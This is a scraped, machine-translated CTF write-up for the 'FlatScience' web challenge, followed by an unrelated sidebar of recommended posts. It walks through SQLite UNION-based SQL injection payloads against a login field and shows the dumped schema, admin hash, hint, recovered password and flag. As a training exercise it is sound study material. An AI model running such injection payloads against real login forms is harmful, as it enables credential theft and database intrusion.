当前位置:网站首页>[attack and defense world web] difficulty four-star 12 point advanced question: flatscience
[attack and defense world web] difficulty four-star 12 point advanced question: flatscience
2022-07-23 21:01:00 【Black zone (rise)】
Two 、FlatScience
How to solve the problem :
1、 Understand the source code , Database Injection , encryption
The process :
I prefer to watch it first robots.txt file
/admin.php Interface
/login.php Interface
Ctrl+U Open source
Found out ?debug
Found new source code
Start the code audit
Discovery database is SQLite3( And MySQL There is a difference ,sqlite_master Relevant information is stored in the table
)type/name/tbl_name/rootpage/sql It records the information when the user creates the table
And the annotation is --
Also found the input usr Injection of being
There's no filtering , It can be spliced into the database for execution
Use bp Intercept , And inject
( stay bp In the injection )
Determine the number of fields
1' order by 3 --
( Report errors )
1' order by 2 --
( Echo normal )
So the number of fields is 2
Judge echo
1' union select 1,2 --
The echo bit is the second
check sql Fields in the table
CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29
After decoding
CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))
Field has :id name password hint
Construct query name
payload:
1' union select id, name from Users--
admin
Construct query password
payload:
1' union select id, password from Users--
3fab54a50e770d830c0416df817567662a9dc85c
Construct query hint
payload:
1' union select id, hint from Users--
my+fav+word+in+my+fav+paper%3F%21
After decoding
my+fav+word+in+my+fav+paper?!
We get the first data in the table
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c(MD5 Is message digest encryption , It may not work out )
hint=my+fav+word+in+my+fav+paper?!( It's in his paper )
Decrypted for
ThinJerboaSalz!
That word is Salz
ThinJerboaSalz! subtract Salz
So the password is ThinJerboa
stay /admin.php Page to login
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
边栏推荐
- ModelBox端云协同AI开发套件(RK3568)试用记录(二)
- Educational Codeforces Round 132 A-D题解
- 深入浅出边缘云 | 1. 概述
- Cesium 事件详解(鼠标事件、相机事件、键盘事件、场景触发事件)
- LeetCode热题 HOT52-100
- AB team score flow chart, get the names of the players who score three consecutive times and the names of the players who catch up with and surpass the opponents each time (PDD)
- STM32c8t6驱动激光雷达(一)
- Himawari-8 数据介绍及下载方法
- KubeVela离线安装
- Microservice architecture vs single service architecture [what can Huawei cloud service do in the microservice mode]
猜你喜欢
![[continuous update] collection of raspberry pie startup and failure series](/img/f3/706a625cdc214960e2d9ca0c7ea41c.jpg)
随机推荐
Microservice architecture vs single service architecture [what can Huawei cloud service do in the microservice mode]
Network learning infrared module, 8-way emission independent control
比较关注证券公司究竟哪个佣金最低?请问网上开户安全么?
VLAN综合实验
Addon plug-in 002 of CDR plug-in development - write an EXE program that can be run by double clicking in 1 minute
Green-Tao 定理 (4): 能量增量方法
HDU - 2586 How far away ? (multiply LCA)
Green Tao theorem (4): energy increment method
LeetCode热题 HOT52-100
jsp+ssm+mysql实现的租车车辆管理系统汽车租赁
Preprocessing tropomi (sentinel 5p) data with envi
UnauthorizedAccessException:Access to the path “/xx/xx.xx“ is denied
KubeVela离线安装
Trial record of ModelBox end cloud collaborative AI development kit (rk3568) (II)
Jetson nano recording stepping on the pit (it will definitely solve your problem)
2022.7.11 MySQL job
TROPOMI(哨兵5P)数据介绍及下载方法
vite3学习记录
Now I don't know how to synchronize at all
实现生成订单30分钟未支付,则自动取消